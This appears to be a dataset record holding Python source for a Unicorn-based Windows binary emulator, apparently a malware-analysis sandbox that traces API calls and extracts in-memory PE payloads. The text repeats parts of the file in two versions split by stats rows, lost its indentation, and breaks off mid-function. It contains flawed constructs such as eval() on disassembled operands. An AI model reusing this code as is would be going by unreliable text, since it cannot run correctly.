if api_name_tmp == None:
try:
api_name = self.raw_IAT[dest_addr]
except:
return
else:
api_name = api_name_tmp
is_valid, description, args, args_count = self.extract_API_args(api_name)
if not is_valid:
if self.debug:
print('[!] Unknown call destination, fix me dude')
self.uc.emu_stop()
if is_ptr:
api_name = '&' + api_name
display_line = instruction.replace(dest_addr, api_name)
if not self.silent:
            print('> Tracing instruction ' + hex(addr), ':', mnemonic, display_line)
            # print('> Tracing instruction ' + hex(addr), ': call', display_line + ' #' + description)
if mnemonic == 'call':
self.fake_syscall(addr, args_count, api_name, byte, 0x0) # Return 0 by default
elif mnemonic == 'jmp':
self.fake_jmpcall(addr, args_count, api_name, byte, 0x0)
# Read <size> bytes from the stack address <start>
def read_stack(self, start, size):
print('=========== Stack Dump ==========')
final_stack = self.uc.mem_read(start, size)
stack_addr = start
for x in range(0, size // 4):
stack_addr += 4
stack_content = final_stack[0:4]
final_stack = final_stack[4:]
stack_value = struct.unpack('I', stack_content)[0]
print('0x%08x : 0x%08x' % (stack_addr, stack_value))
# Fake syscall function
def fake_syscall(self, addr, args_count, api, opcode, ret_value):
api_name = api.replace('&', '')
display = '> ' + hex(addr) + ': ' + api_name + '('
current_esp = self.uc.reg_read(UC_X86_REG_ESP)
val = self.uc.mem_read(current_esp, 4*args_count)
loc_esp = self.uc.reg_read(UC_X86_REG_ESP)
args = []
for x in range(0, args_count):
value = self.read_byte(loc_esp + (x*4))
args.append(hex(value))
        # Test whether or not a special hook exists
        if api_name in dir(winsyscall):
            # This API needs to be intercepted with a special hardcoded hook
function = getattr(winsyscall, api_name)
ret_code, ret_args = function(self, args)
if ret_code == 'THREAD':
taddr = int(self.threads[-1])
ret_code = 0x1
for elem in self.handle:
hval = self.handle[elem][0]
if hval == taddr:
ret_code = int(elem, 16)
break
if self.debug:
print('[!] Spawning a new thread at ' + hex(self.threads[-1]))
if ret_args == 'EXIT':
print(display + '0x0)')
self.uc.emu_stop()
return
display += str(ret_args).replace('[', '').replace(']','').replace("'", '') + ') = '
if ret_code != None:
display += hex(ret_code)
else:
display += str(ret_code)
else:
clean_stack(self, args_count)
ret_code = 0x0
display += str(args).replace('[', '').replace(']', '').replace("'", '') + ') = '
display += hex(ret_code)
# Avoid dead end / infinite loop
if len(self.current_loop) < self.max_loop:
self.current_loop.append(addr)
elif len(self.current_loop) == self.max_loop:
            if sorted(self.previous_loop) == sorted(self.current_loop):  # compare sorted copies; list.sort() mutates in place and returns None
                if self.current_loop_counter == self.max_loop:
                    print('[!] Infinite loop detected, stopping the emulation')
self.uc.emu_stop()
return
self.current_loop = []
self.current_loop_counter += 1
else:
            self.previous_loop = list(self.current_loop)  # copy, not an alias
print(display)
        # Does the function return something?
if ret_code != None:
# Fake return code to 0
self.uc.reg_write(UC_X86_REG_EAX, ret_code)
# Redirect EIP
original_eip = self.uc.reg_read(UC_X86_REG_EIP)
self.uc.reg_write(UC_X86_REG_EIP, original_eip + len(opcode))
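    # Illustrative trace line produced above (hypothetical values):
    #   > 0x401234: CreateFileA(0x402000, 0x80000000, 0x1, 0x0, 0x3, 0x80, 0x0) = 0x0
    # i.e. call site, resolved API name, stack-harvested arguments, faked return.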
# Pop a value from the stack
def popstack(self):
current_esp = self.uc.reg_read(UC_X86_REG_ESP)
val = self.uc.mem_read(current_esp, 4)
stack_value = struct.unpack('I', val)[0]
return stack_value
    # Advance ESP by 4 bytes (discard the value on top of the stack)
def decstack(self):
current_esp = self.uc.reg_read(UC_X86_REG_ESP)
self.uc.reg_write(UC_X86_REG_ESP, int(current_esp + 4))
    # Read a 4-byte (DWORD) little-endian value at a given address
    def read_byte(self, addr):
        val = self.uc.mem_read(addr, 4)
        formatted_value = struct.unpack('I', val)[0]
        return formatted_value
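    # Taken together (descriptive note): popstack() peeks the DWORD at ESP
    # without moving it, decstack() then advances ESP past it, and read_byte()
    # is the generic DWORD peek used for argument harvesting above.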
# Fake jmp to syscall ptr
def fake_jmpcall(self, addr, args_count, api, opcode, ret_value):
display = '> ' + hex(addr) + ': ' + api.replace('&', '') + '('
ret = self.popstack()
self.decstack()
loc_esp = self.uc.reg_read(UC_X86_REG_ESP)
loc_args = []
for x in range(0, args_count):
value = self.read_byte(loc_esp + (x*4))
loc_args.append(hex(value))
# display += str(loc_args).replace('[', '').replace(']', '').replace("'", '') + ''
args = loc_args
api_name = api.replace('&', '')
if api_name in dir(winsyscall):
# This API need to be intercept with a special hardcoded hook
function = getattr(winsyscall, api_name)
ret_code, ret_args = function(self, args)
if ret_code == 'THREAD':
taddr = int(self.threads[-1])
ret_code = 0x1
for elem in self.handle:
hval = self.handle[elem][0]
if hval == taddr:
ret_code = int(elem, 16)
break
if self.debug:
print('[!] Spawning a new thread at ' + hex(self.threads[-1]))
if ret_args == 'EXIT':
print(display + '0x0)')
self.uc.emu_stop()
return
display += str(ret_args).replace('[', '').replace(']','').replace("'", '') + ') = '
if ret_code != None:
display += hex(ret_code)
else:
display += str(ret_code)
else:
# clean_stack(self, args_count)
ret_code = 0x0
display += str(args).replace('[', '').replace(']', '').replace("'", '') + ') = '
display += hex(ret_code)
# Avoid dead end / infinite loop
if len(self.current_loop) < self.max_loop:
self.current_loop.append(addr)
elif len(self.current_loop) == self.max_loop:
            if sorted(self.previous_loop) == sorted(self.current_loop):  # compare sorted copies; list.sort() mutates in place and returns None
                if self.current_loop_counter == self.max_loop:
                    print('[!] Infinite loop detected, stopping the emulation')
self.uc.emu_stop()
return
self.current_loop = []
self.current_loop_counter += 1
else:
            self.previous_loop = list(self.current_loop)  # copy, not an alias
print(display)
        # Does the function return something?
if ret_code != None:
# Fake return code to 0
self.uc.reg_write(UC_X86_REG_EAX, ret_code)
else:
# Fake return code to 0
self.uc.reg_write(UC_X86_REG_EAX, 0x0)
# Redirect EIP
self.uc.reg_write(UC_X86_REG_EIP, ret)
# Print a list of used handles
def read_handle(self):
print('========= Opened Handles ========')
for h in self.handle:
handle_addr = h
handle_value = self.handle[h][0]
handle_type = self.handle[h][1]
if handle_type == 'dummy':
continue
if len(str(handle_value)) > 50:
handle_value = str(handle_value)[:25] + '[...]' + str(handle_value)[-9:]
print('Address=' + str(handle_addr) + ' Type=' + str(handle_type) + ' Value=' + str(handle_value) )
    # Show and extract potential payloads
    def display_extracts(self):
        # Search for PE binaries in allocated memory regions
for vmem in self.virtual_memory:
content = self.uc.mem_read(vmem.data_address, vmem.data_size)
if content[:2] == b'MZ':
self.extracts['hmemory_' + hex(vmem.data_address)] = content
print('======= Extracted Payloads =======')
if len(self.extracts) == 0:
print('Nothing found')
return
dirname = './' + self.shortname + '_emu'
if not os.path.exists(dirname):
os.makedirs(dirname)
counter = 0
for entry in self.extracts:
name = entry[1:]
options = ''
data = self.extracts[entry]
if len(str(data)) > 50:
sdata = str(data)[:25] + '[...]' + str(data)[-9:]
else:
                sdata = str(data)
if data[:2] == b'MZ' or data[:2] == 'MZ':
options = ' (PE payload detected)'
print('Name="' + name + '" Content="' + sdata + '"' + options)
fname = name.split('\\')[-1]
if fname == '':
fname = 'generic_extract_' + str(counter) + '.bin'
f = open(dirname + '/' + fname, 'wb')
f.write(data)
            f.close()
            counter += 1
# Print a list of dynamically resolved functions
def read_dynamic_imports(self):
print('========= Dynamic Imports =======')
if len(self.dynamics) == 0x0:
            print('No dynamic imports were detected during the emulation')
for i in self.dynamics:
print('Address=', i[0], ' Name=', i[1])
# Print a dump of the current registers
def read_full_regs(self):
print('=== Registers Dump ===')
print('EAX: 0x%08x | EBP: 0x%08x' % (self.uc.reg_read(UC_X86_REG_EAX), self.uc.reg_read(UC_X86_REG_EBP)))
print('EBX: 0x%08x | ESP: 0x%08x' % (self.uc.reg_read(UC_X86_REG_EBX), self.uc.reg_read(UC_X86_REG_ESP)))
print('ECX: 0x%08x | ESI: 0x%08x' % (self.uc.reg_read(UC_X86_REG_ECX), self.uc.reg_read(UC_X86_REG_ESI)))
print('EDX: 0x%08x | EDI: 0x%08x' % (self.uc.reg_read(UC_X86_REG_EDX), self.uc.reg_read(UC_X86_REG_EDI)))
print('EIP: 0x%08x ' % self.uc.reg_read(UC_X86_REG_EIP))
    # Retrieve the corresponding Windows API entry from our list
def extract_API_args(self, api_name):
with open(API_refs) as f:
line = next((l for l in f if api_name == l.split(';')[0]), None)
if line == None or line == '':
            # API not found in the reference list
return False, '', '', 0
name = line.split(';')[0]
description = line.split(';')[1].split(';')[0]
args = line.split(';')[2]
args_count = args.count(',') + 1
if args_count == 1 and args.replace('\n', '').replace(' ','') == '':
args_count = 0
if args == '' or args == None:
            # Arguments field is empty; argument count and types are unknown
# print('[!] Cannot gather arguments count and type, fix me')
return True, description, '', 0
return True, description, args, args_count
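    # Assumed winapi_9k.csv row layout (inferred from the parsing above, not
    # verified against the shipped file):
    #   <ApiName>;<Description>;<Arg1, Arg2, ...>
    # Hypothetical example: CreateFileA;Creates or opens a file;lpFileName, dwDesiredAccess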
# Setup a fake IAT
def generate_Import_Address_Table(self):
self.IAT = {}
self.raw_IAT = {}
dll_count = 0
functions_count = 0
for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
functions = {}
dll_count += 1
for imp in entry.imports:
functions_count += 1
#print(imp.name.decode())
functions[hex(imp.address)] = imp.name.decode()
self.raw_IAT[hex(imp.address)] = imp.name.decode()
self.IAT[entry.dll.lower().decode()] = functions
self.IAT['dynamic_import'] = {'0x00ff0000': 'placeholder_dynamic_import'}
if self.debug:
            print('[DEBUG] ' + str(functions_count) + ' functions imported in the IAT from ' + str(dll_count) + ' DLLs')
# Setup a hook structure for the IAT
def hook_Import_Address_Table(self):
self.IAT_hook = {}
cnt = 0
for dll in self.IAT:
if dll == 'dynamic_import':
continue
for entry_addr in self.IAT[dll]:
entry = self.IAT[dll][entry_addr]
#self.uc.mem_write(int(entry_addr, 16), bytes([cnt]))
content = self.uc.mem_read(int(entry_addr, 16), 0x4)
value = '0x' + struct.pack("<I", int(bytes(content).hex(), 16)).hex()
self.IAT_hook[entry] = value
cnt += 1
#print(self.IAT_hook)
if self.debug:
            print('[DEBUG] ' + str(cnt) + ' IAT entries were hooked')
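    # Resulting mapping (illustrative): API name -> hex of the pointer bytes
    # currently stored in its IAT slot, so hook_syscall can match indirect
    # calls made through a register back to a function name.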
# Setup the process TIB structure
def generate_Thread_Information_Block(self):
self.TEB_base_addr = 0x200000
self.process_ID = 0x1908
self.thread_ID = 0x10C
self.PEB_base_addr = self.TEB_base_addr + 0x1000
TEB = b''
TEB += struct.pack("<I", 0xffffffff) # FS:[0x00] Structure Exception Handler (SEH)
TEB += struct.pack("<I", (self.stack_addr + self.stack_size)) # FS:[0x04] Stack Base
TEB += struct.pack("<I", self.stack_addr) # FS:[0x08] Stack Limit
TEB += struct.pack("<I", 0x0) # FS:[0x0C] Subsystem TIB
TEB += struct.pack("<I", 0x0) # FS:[0x10] Fiber Data
TEB += struct.pack("<I", 0x0) # FS:[0x14] Arbitrary Data Slot
TEB += struct.pack("<I", self.TEB_base_addr) # FS:[0x18] Linear Address of TEB
TEB += struct.pack("<I", 0x0) # FS:[0x1C] Environment Pointer
TEB += struct.pack("<I", self.process_ID) # FS:[0x20] Process ID
TEB += struct.pack("<I", self.thread_ID) # FS:[0x24] Current Thread ID
TEB += struct.pack("<I", 0x0) # FS:[0x28] Active RPC Handle
TEB += struct.pack("<I", 0x0) # FS:[0x2C] Linear Address of the thread-local storage array
TEB += struct.pack("<I", self.PEB_base_addr) # FS:[0x30] Linear Address of the Process Environment Block (PEB)
page_size=4096
m = 0x5000 % page_size
f = page_size - m
aligned_size = 0x5000 + f
# Map and write the TEB in memory
self.uc.mem_map(self.TEB_base_addr, aligned_size)
self.uc.mem_write(self.TEB_base_addr, TEB)
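    # Consumption sketch (illustrative, assuming FS is based at TEB_base_addr):
    # emulated code reading "mov eax, fs:[0x30]" would obtain PEB_base_addr,
    # and "mov eax, fs:[0x18]" the TEB's own linear address.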
def launch(self):
        # Get the header's most important fields
self.header_image_base = self.pe.OPTIONAL_HEADER.ImageBase
self.header_size_of_image = self.pe.OPTIONAL_HEADER.SizeOfImage
self.header_entrypoint = self.pe.OPTIONAL_HEADER.AddressOfEntryPoint
self.mapped_image = self.pe.get_memory_mapped_image(ImageBase=self.header_image_base)
self.mapped_size = (len(self.mapped_image) + 0x1000) & ~0xFFF
self.exit_addr = 0xfffff000
# Redirect to file
if self.out != None:
sys.stdout = open(self.out, "w")
# Get virtual size needed for PE mapping
min_offset = sys.maxsize
virtual_size = 0
for section in self.pe.sections:
min_offset = section.VirtualAddress
virtual_size += min_offset
virtual_size += min_offset
m = virtual_size % 4096
f = 4096 - m
aligned_virtual_size = virtual_size + f
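        # Note: aligned_virtual_size is computed but never used below (the
        # mapping relies on self.mapped_size), and when virtual_size is
        # already page-aligned this formula still adds one extra page.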
# Map the binary in memory
self.uc.mem_map(self.header_image_base, self.mapped_size)
self.uc.mem_write(self.header_image_base, self.mapped_image)
self.start_addr = self.header_entrypoint + self.header_image_base
if self.debug:
print('[DEBUG] Binary mapped in memory at 0x%08x' % self.header_image_base)
# Initialize the stack
self.stack_addr = 0x0
self.stack_size = 0x200000
self.uc.mem_map(self.stack_addr, self.stack_size)
if self.debug:
print('[DEBUG] Stack of 0x%x bytes starting at 0x%08x' % (self.stack_size, self.stack_addr))
self.uc.reg_write(UC_X86_REG_ESP, self.stack_addr + self.stack_size - 0x500)
self.uc.reg_write(UC_X86_REG_EBP, self.stack_addr + self.stack_size - 0x100)
if self.debug:
print('[DEBUG] Initial stack frame created between 0x%08x and 0x%08x' % (self.stack_size - 0x500, self.stack_size - 0x100))
        # Create the TEB structure
self.generate_Thread_Information_Block()
if self.debug:
print('[DEBUG] Thread Information Block initiated at 0x%08x' % self.TEB_base_addr)
        # Create the PEB structure
# TODO
# Create a fake IAT
self.generate_Import_Address_Table()
# Place hooks on the IAT
self.hook_Import_Address_Table()
        # Initialize the registers
self.uc.reg_write(UC_X86_REG_EDI, self.start_addr)
self.uc.reg_write(UC_X86_REG_ESI, self.start_addr)
self.uc.reg_write(UC_X86_REG_EDX, self.start_addr)
self.uc.reg_write(UC_X86_REG_ECX, self.start_addr)
        self.uc.reg_write(UC_X86_REG_EBX, self.PEB_base_addr) # EBX points to the PEB address
        self.uc.reg_write(UC_X86_REG_EAX, self.TEB_base_addr) # EAX points to the TEB address
# Place a debug hook
self.uc.hook_add(UC_HOOK_CODE, self.hook_code)
# Place a memory debug hook
#self.uc.hook_add(UC_ERR_FETCH_UNMAPPED, self.hook_mem_invalid)
# Start emulation
print('[DEBUG] Starting the emulation of "%s.exe" from 0x%08x' % (self.drivename, self.start_addr))
print()
self.uc.emu_start(self.start_addr, self.start_addr + 500000, timeout=20 * UC_SECOND_SCALE)
print()
if len(self.threads) != 0:
uniq_threads = list(dict.fromkeys(self.threads))
else:
uniq_threads = False
if self.debug:
print('[!] Looking for entrypoints in the threads queue')
if uniq_threads:
for thread_addr in uniq_threads:
print('[!] Starting the thread ' + hex(thread_addr))
self.execution_mode = 'thread'
self.uc.hook_add(UC_HOOK_CODE, self.hook_code)
self.uc.emu_start(thread_addr, self.start_addr + 100, timeout=20 * UC_SECOND_SCALE)
#self.uc.reg_write(UC_X86_REG_EIP, add)
print('[!] End of the thread ' + hex(thread_addr))
self.thread_trace = []
print()
        # Display the program's final state
final_esp = self.uc.reg_read(UC_X86_REG_ESP)
final_ebp = self.uc.reg_read(UC_X86_REG_EBP)
        if args.dynamics:  # reads the module-global CLI args; the flag is not stored on self
self.read_dynamic_imports()
print()
if self.stack:
self.read_stack(final_esp, final_ebp - final_esp)
print()
if self.registers:
self.read_full_regs()
print()
if self.handle_list:
self.read_handle()
print()
if self.show_extract:
self.display_extracts()
print()
if self.trace:
print('==== Call trace ====')
print(' → Entrypoint')
for elem in self.calltrace:
print(' → ' + elem)
if self.out != None:
sys.stdout.close()
def main(args):
emul = Environment(args)
emul.launch()
parser = argparse.ArgumentParser(description='Windows Binary Emulator')
parser.add_argument('-p', '--path', required=True, help='path to the binary file to emulate')
parser.add_argument('-b', '--breakpoint', required=False, help='pause the execution at the given address')
parser.add_argument('--trace', required=False, action="store_true", help='display the call trace of the binary')
parser.add_argument('--dump', required=False, action="store_true", help='display a full dump of the program\'s state after the execution')
parser.add_argument('--stack', required=False, action="store_true", help='display a dump of the stack after the execution')
parser.add_argument('--registers', required=False, action="store_true", help='display a dump of the registers after the execution')
parser.add_argument('--debug', required=False, action="store_true", help='display debug messages')
parser.add_argument('--silent', required=False, action="store_true", help='only print out the system calls')
parser.add_argument('--handle', required=False, action="store_true", help='display the list of used handles')
parser.add_argument('--extract', required=False, action="store_true", help='extract potential payloads found in memory. Files are saved to <bin_name>_emu/')
parser.add_argument('--imports', required=False, action="store_true", help='UNIMPLEMENTED - display the static content of the import address table (IAT)')
parser.add_argument('--dynamics', required=False, action="store_true", help='display the list of dynamically resolved syscalls')
parser.add_argument('--out', required=False, help='save the emulation output to a file')
args = parser.parse_args()
main(args)
| 43.001304
| 161
| 0.545479
|
from unicorn import *
from unicorn.x86_const import *
from capstone import *
from importlib import import_module
from emulation.syscall import clean_stack
import argparse
import emulation.syscall as winsyscall
import pefile
import struct
import sys
import ast
import os
API_refs = 'winapi_9k.csv'
regs = ['eax', 'ebx', 'ecx', 'edx', 'esp', 'ebp', 'edi', 'esi']
md = Cs(CS_ARCH_X86, CS_MODE_32)
full_content = ''
class Environment:
def __init__(self, args):
self.breakpoint = args.breakpoint
self.trace = args.trace
self.dump = args.dump
self.silent = args.silent
self.out = args.out
self.stack = args.stack
self.registers = args.registers
self.debug = args.debug
self.handle_list = args.handle
self.show_extract = args.extract
self.imports = args.imports
self.dynamics = []
if self.trace:
self.calltrace = []
if self.stack and self.registers:
self.dump = True
if self.dump:
self.registers = True
self.stack = True
path = args.path
self.shortname = path.split('/')[-1].split('.')[0].lower()
self.drivename = 'C:\\Users\\EllenRipley\\Desktop\\' + self.shortname
self.username = 'EllenRipley'
self.computername = 'Nostromo'
self.computer_mac = '0F-0C-95-86-20-29'
self.computer_ip = '192.168.0.12'
self.path = path
self.chunks = []
self.virtual_memory = []
self.resources = {}
self.extracts = {}
self.threads = []
self.thread_ret = None
self.thread_trace = []
self.thread_max_replay = 5
self.max_loop = 10
self.current_loop_counter = 0
self.previous_loop = []
self.current_loop = []
self.execution_mode = 'default'
self.uc = Uc(UC_ARCH_X86, UC_MODE_32)
self.handle = {'0xaa': ['placeholder_dynamic_handle', 'dummy']}
try:
self.pe = pefile.PE(path)
except OSError as e:
print(e)
exit -1
except pefile.PEFormatError as e:
print(f'Malformated or invalid PE file: {e.value}')
exit -1
def hook_code(self, a, address, size, user_data):
instruction = self.uc.mem_read(address, size)
if self.breakpoint:
if hex(address) == self.breakpoint:
final_esp = self.uc.reg_read(UC_X86_REG_ESP)
final_ebp = self.uc.reg_read(UC_X86_REG_EBP)
self.uc.emu_stop()
self.calltrace.append('breakpoint')
print('[+] Breakpoint hits at 0x%08x' % int(self.breakpoint, 16))
return
for i in md.disasm(instruction, address):
if i.mnemonic == 'add' and i.op_str == 'byte ptr [eax], al':
print('[!] End of the main emulation thread')
self.uc.emu_stop()
return
if str(i.mnemonic) == 'call' and 'dword ptr [' in i.op_str:
target = i.op_str.split('[')[1].split(']')[0]
if target not in self.raw_IAT and self.silent:
self.hook_syscall(i.op_str, 'call', i.address, i.bytes)
else:
self.hook_syscall(i.op_str, 'call', i.address, i.bytes)
elif str(i.mnemonic) == 'call':
self.hook_syscall(i.op_str, 'call', i.address, i.bytes)
elif str(i.mnemonic) == 'jmp' and 'dword ptr [' in i.op_str:
target = i.op_str.split('[')[1].split(']')[0]
if i.op_str in regs:
dest_addr = '0x%08x' % eval('self.uc.reg_read(UC_X86_REG_' + i.op_str.replace(' ','').upper() + ')')
elif ('+' in i.op_str or '-' in i.op_str or '*' in i.op_str):
left_elem = i.op_str.split('[')[1].split(']')[0].split(' ')[0].replace(' ', '')
operator = i.op_str.split('[')[1].split(']')[0].split(' ')[1].replace(' ', '')
right_elem = i.op_str.split('[')[1].split(']')[0].split(' ')[2].replace(' ', '')
if left_elem in regs:
left_value = hex(self.uc.reg_read(eval('UC_X86_REG_' + left_elem.upper())))
dest_addr_ptr = '0x%08x' % eval(left_value + operator + right_elem)
content = self.uc.mem_read(int(dest_addr_ptr, 16), 0x4)
target = '0x%08x' % struct.unpack('I', content)[0]
elif '+' in left_elem or '-' in left_elem or '*' in left_elem:
lleft_elem = left_elem.split('*')[0].split('-')[0].split('+')[0]
lleft_value = hex(self.uc.reg_read(eval('UC_X86_REG_' + lleft_elem.upper())))
lleft_op = left_elem.replace(lleft_elem, lleft_value)
dest_addr_ptr = '0x%08x' % eval(lleft_op + operator + right_elem)
content = self.uc.mem_read(int(dest_addr_ptr, 16), 0x4)
target = '0x%06x' % struct.unpack('I', content)[0]
else:
print('[-] Something went terribly wrong')
exit(1)
else:
target = i.op_str.split('[')[1].split(']')[0]
if target not in self.raw_IAT:
if not self.silent:
print('> Tracing intruction ' + hex(i.address), ':', i.mnemonic, i.op_str)
self.hook_syscall(i.op_str, 'jmp', i.address, i.bytes)
else:
self.hook_syscall(i.op_str, 'jmp', i.address, i.bytes)
else:
if not self.silent:
print('> Tracing intruction ' + hex(i.address), ':', i.mnemonic, i.op_str)
def hook_syscall(self, instruction, mnemonic, addr, byte):
if self.execution_mode == 'thread':
self.thread_trace.append(addr)
dup_api = {i:self.thread_trace.count(i) for i in self.thread_trace}
for elem in dup_api:
rep = dup_api[elem]
if rep >= self.thread_max_replay:
self.uc.emu_stop()
if self.debug:
print('[!] Thread stoped due to it\'s repetition (infinite loop)')
return
is_ptr = False
if '[' in instruction:
is_ptr = True
try:
if instruction in regs:
dest_addr = '0x%08x' % eval('self.uc.reg_read(UC_X86_REG_' + instruction.replace(' ','').upper() + ')')
elif ('+' in instruction or '-' in instruction) and is_ptr:
left_elem = instruction.split('[')[1].split(']')[0].split(' ')[0].replace(' ', '')
operator = instruction.split('[')[1].split(']')[0].split(' ')[1].replace(' ', '')
right_elem = instruction.split('[')[1].split(']')[0].split(' ')[2].replace(' ', '')
# call/jmp [eax+4]
if left_elem in regs:
left_value = hex(self.uc.reg_read(eval('UC_X86_REG_' + left_elem.upper())))
dest_addr_ptr = '0x%08x' % eval(left_value + operator + right_elem)
content = self.uc.mem_read(int(dest_addr_ptr, 16), 0x4)
dest_addr = '0x%08x' % struct.unpack('I', content)[0]
# call/jmp [eax*4 + 10]
elif '+' in left_elem or '-' in left_elem or '*' in left_elem:
lleft_elem = left_elem.split('*')[0].split('-')[0].split('+')[0]
lleft_value = hex(self.uc.reg_read(eval('UC_X86_REG_' + lleft_elem.upper())))
lleft_op = left_elem.replace(lleft_elem, lleft_value)
dest_addr_ptr = '0x%08x' % eval(lleft_op + operator + right_elem)
content = self.uc.mem_read(int(dest_addr_ptr, 16), 0x4)
dest_addr = '0x%08x' % struct.unpack('I', content)[0]
else:
print('[-] Something went terribly wrong')
exit(1)
else:
dest_addr = '0x' + instruction.split('0x')[1].replace(']','')
except:
print('[-] Weird call at 0x%08X, investigate me ! "%s %s"' % (addr, mnemonic, instruction))
return
# Are we calling a function from the IAT in a weird way ?
#print(self.IAT)
if str(dest_addr) in self.IAT_hook.values():
target_iat_call = list(self.IAT_hook.keys())[list(self.IAT_hook.values()).index(dest_addr)]
for dll in self.IAT:
for func_addr in self.IAT[dll]:
func_name = self.IAT[dll].get(func_addr)
if func_name == target_iat_call:
#print('[*] IAT call detected:', target_iat_call, func_addr)
dest_addr = func_addr
break
#return
# Is this targeting the IAT or a mapped function ?
api_name_tmp = None
IAT_entry = list(self.raw_IAT.keys())
if dest_addr not in IAT_entry:
if is_ptr:
raw_ptr = self.uc.mem_read(int(dest_addr, 16), 0x4)
ptr = '0x%08x' % struct.unpack('<I', raw_ptr)[0]
if ptr in self.IAT_hook.values():
try:
api_name_tmp = [k for k,v in self.IAT_hook.items() if v == ptr][0]
except:
api_name_tmp = None
else:
if not self.silent:
print('> Tracing intruction ' + hex(addr), ':', mnemonic, self.shortname + '.' + str(instruction) )
print('> Following function ' + self.shortname + '.' + str(instruction) + ':')
if self.trace:
self.calltrace.append(self.shortname + '.' + str(instruction))
return
if api_name_tmp == None:
try:
api_name = self.raw_IAT[dest_addr]
except:
return
else:
api_name = api_name_tmp
is_valid, description, args, args_count = self.extract_API_args(api_name)
if not is_valid:
if self.debug:
print('[!] Unknown call destination, fix me dude')
self.uc.emu_stop()
if is_ptr:
api_name = '&' + api_name
display_line = instruction.replace(dest_addr, api_name)
if not self.silent:
print('> Tracing intruction ' + hex(addr), ':', mnemonic, display_line)
# print('> Tracing intruction ' + hex(addr), ': call', display_line + '
if mnemonic == 'call':
self.fake_syscall(addr, args_count, api_name, byte, 0x0) # Return 0 by default
elif mnemonic == 'jmp':
self.fake_jmpcall(addr, args_count, api_name, byte, 0x0)
# Read <size> bytes from the stack address <start>
def read_stack(self, start, size):
print('=========== Stack Dump ==========')
final_stack = self.uc.mem_read(start, size)
stack_addr = start
for x in range(0, size // 4):
stack_addr += 4
stack_content = final_stack[0:4]
final_stack = final_stack[4:]
stack_value = struct.unpack('I', stack_content)[0]
print('0x%08x : 0x%08x' % (stack_addr, stack_value))
# Fake syscall function
def fake_syscall(self, addr, args_count, api, opcode, ret_value):
api_name = api.replace('&', '')
display = '> ' + hex(addr) + ': ' + api_name + '('
current_esp = self.uc.reg_read(UC_X86_REG_ESP)
val = self.uc.mem_read(current_esp, 4*args_count)
loc_esp = self.uc.reg_read(UC_X86_REG_ESP)
args = []
for x in range(0, args_count):
value = self.read_byte(loc_esp + (x*4))
args.append(hex(value))
# Test weather or not a special hook exist
if api_name in dir(winsyscall):
# This API need to be intercept with a special hardcoded hook
function = getattr(winsyscall, api_name)
ret_code, ret_args = function(self, args)
if ret_code == 'THREAD':
taddr = int(self.threads[-1])
ret_code = 0x1
for elem in self.handle:
hval = self.handle[elem][0]
if hval == taddr:
ret_code = int(elem, 16)
break
if self.debug:
print('[!] Spawning a new thread at ' + hex(self.threads[-1]))
if ret_args == 'EXIT':
print(display + '0x0)')
self.uc.emu_stop()
return
display += str(ret_args).replace('[', '').replace(']','').replace("'", '') + ') = '
if ret_code != None:
display += hex(ret_code)
else:
display += str(ret_code)
else:
clean_stack(self, args_count)
ret_code = 0x0
display += str(args).replace('[', '').replace(']', '').replace("'", '') + ') = '
display += hex(ret_code)
# Avoid dead end / infinite loop
if len(self.current_loop) < self.max_loop:
self.current_loop.append(addr)
elif len(self.current_loop) == self.max_loop:
if self.previous_loop.sort() == self.current_loop.sort():
if self.current_loop_counter == self.max_loop:
print('[!] Inifinite loop detected, stoping the emulation')
self.uc.emu_stop()
return
self.current_loop = []
self.current_loop_counter += 1
else:
self.previous_loop = self.current_loop
print(display)
# Does the function return something ?
if ret_code != None:
# Fake return code to 0
self.uc.reg_write(UC_X86_REG_EAX, ret_code)
# Redirect EIP
original_eip = self.uc.reg_read(UC_X86_REG_EIP)
self.uc.reg_write(UC_X86_REG_EIP, original_eip + len(opcode))
# Pop a value from the stack
def popstack(self):
current_esp = self.uc.reg_read(UC_X86_REG_ESP)
val = self.uc.mem_read(current_esp, 4)
stack_value = struct.unpack('I', val)[0]
return stack_value
# Decrement the stack value
def decstack(self):
current_esp = self.uc.reg_read(UC_X86_REG_ESP)
self.uc.reg_write(UC_X86_REG_ESP, int(current_esp + 4))
# Read a 4 byte value at a given address
def read_byte(self, addr):
val = self.uc.mem_read(addr, 4)
formated_value = struct.unpack('I', val)[0]
return formated_value
# Fake jmp to syscall ptr
def fake_jmpcall(self, addr, args_count, api, opcode, ret_value):
display = '> ' + hex(addr) + ': ' + api.replace('&', '') + '('
ret = self.popstack()
self.decstack()
loc_esp = self.uc.reg_read(UC_X86_REG_ESP)
loc_args = []
for x in range(0, args_count):
value = self.read_byte(loc_esp + (x*4))
loc_args.append(hex(value))
# display += str(loc_args).replace('[', '').replace(']', '').replace("'", '') + ''
args = loc_args
api_name = api.replace('&', '')
if api_name in dir(winsyscall):
function = getattr(winsyscall, api_name)
ret_code, ret_args = function(self, args)
if ret_code == 'THREAD':
taddr = int(self.threads[-1])
ret_code = 0x1
for elem in self.handle:
hval = self.handle[elem][0]
if hval == taddr:
ret_code = int(elem, 16)
break
if self.debug:
print('[!] Spawning a new thread at ' + hex(self.threads[-1]))
if ret_args == 'EXIT':
print(display + '0x0)')
self.uc.emu_stop()
return
display += str(ret_args).replace('[', '').replace(']','').replace("'", '') + ') = '
if ret_code != None:
display += hex(ret_code)
else:
display += str(ret_code)
else:
# clean_stack(self, args_count)
ret_code = 0x0
display += str(args).replace('[', '').replace(']', '').replace("'", '') + ') = '
display += hex(ret_code)
if len(self.current_loop) < self.max_loop:
self.current_loop.append(addr)
elif len(self.current_loop) == self.max_loop:
if self.previous_loop.sort() == self.current_loop.sort():
if self.current_loop_counter == self.max_loop:
print('[!] Inifinite loop detected, stoping the emulation')
self.uc.emu_stop()
return
self.current_loop = []
self.current_loop_counter += 1
else:
self.previous_loop = self.current_loop
print(display)
if ret_code != None:
self.uc.reg_write(UC_X86_REG_EAX, ret_code)
else:
self.uc.reg_write(UC_X86_REG_EAX, 0x0)
self.uc.reg_write(UC_X86_REG_EIP, ret)
def read_handle(self):
print('========= Opened Handles ========')
for h in self.handle:
handle_addr = h
handle_value = self.handle[h][0]
handle_type = self.handle[h][1]
if handle_type == 'dummy':
continue
if len(str(handle_value)) > 50:
handle_value = str(handle_value)[:25] + '[...]' + str(handle_value)[-9:]
print('Address=' + str(handle_addr) + ' Type=' + str(handle_type) + ' Value=' + str(handle_value) )
def display_extracts(self):
for vmem in self.virtual_memory:
content = self.uc.mem_read(vmem.data_address, vmem.data_size)
if content[:2] == b'MZ':
